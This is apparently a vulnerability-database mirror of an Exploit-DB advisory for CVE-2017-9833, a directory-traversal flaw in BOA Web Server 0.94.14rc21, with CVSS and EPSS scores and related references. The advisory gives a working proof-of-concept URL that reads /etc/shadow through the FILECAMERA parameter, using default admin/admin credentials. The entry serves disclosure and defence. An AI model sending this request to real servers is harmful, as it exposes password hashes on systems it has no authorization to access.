Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMiguel Mendez ZEDB-ID:42290
HistoryJun 20, 2017 - 12:00 a.m.

BOA Web Server 0.94.14rc21 - Arbitrary File Access

2017-06-2000:00:00
Miguel Mendez Z
www.exploit-db.com
79

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.735 High

EPSS

Percentile

98.1%

JSON
BOA Web Server 0.94.14 - Access to arbitrary files as privileges

Title: Vulnerability in BOA Webserver 0.94.14
Date: 20-06-2017
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: Miguel Mendez Z
Vendor Homepage: http://www.boa.org
Version: Boa Webserver 0.94.14rc21
CVE: CVE-2017-9833


Vulnerability description
-------------------------
-We can read any file located on the server
The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials

Vulnerable variable:
FILECAMERA=../../etc/shadow%00

Exploit link:
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0

Poc:
http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0

Related

zdt 1
ubuntucve 1
nuclei 1
cve 1
packetstorm 1
exploitpack 1
prion 1
attackerkb 1
cvelist 1
openvas 1
nvd 1
thn 1
zdt
zdt
BOA Web Server 0.94.14rc21 - Arbitrary File Access Vulnerability
2017-07-03 00:00:00
ubuntucve
ubuntucve
CVE-2017-9833
2017-06-24 00:00:00
nuclei
nuclei
BOA Web Server 0.94.14 - Arbitrary File Access
2022-03-06 22:58:38
cve
cve
CVE-2017-9833
2017-06-24 02:29:00
packetstorm
packetstorm
BOA Web Server 0.94.14rc21 Arbitrary File Access
2017-07-03 00:00:00
exploitpack
exploitpack
BOA Web Server 0.94.14rc21 - Arbitrary File Access
2017-06-20 00:00:00
prion
prion
Design/Logic Flaw
2017-06-24 02:29:00
attackerkb
attackerkb
CVE-2017-9833
2017-06-24 00:00:00
cvelist
cvelist
CVE-2017-9833
2017-06-24 00:00:00
openvas
openvas
Multiple IP-Cameras Directory Traversal Vulnerability
2017-06-26 00:00:00
nvd
nvd
CVE-2017-9833
2017-06-24 02:29:00
thn
thn
Hackers Exploiting Abandoned Boa Web Servers to Target Critical Industries
2022-11-23 09:28:00

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.735 High

EPSS

Percentile

98.1%

JSON
Related for EDB-ID:42290
zdt1ubuntucve1nuclei1cve1packetstorm1exploitpack1prion1attackerkb1cvelist1openvas1nvd1thn1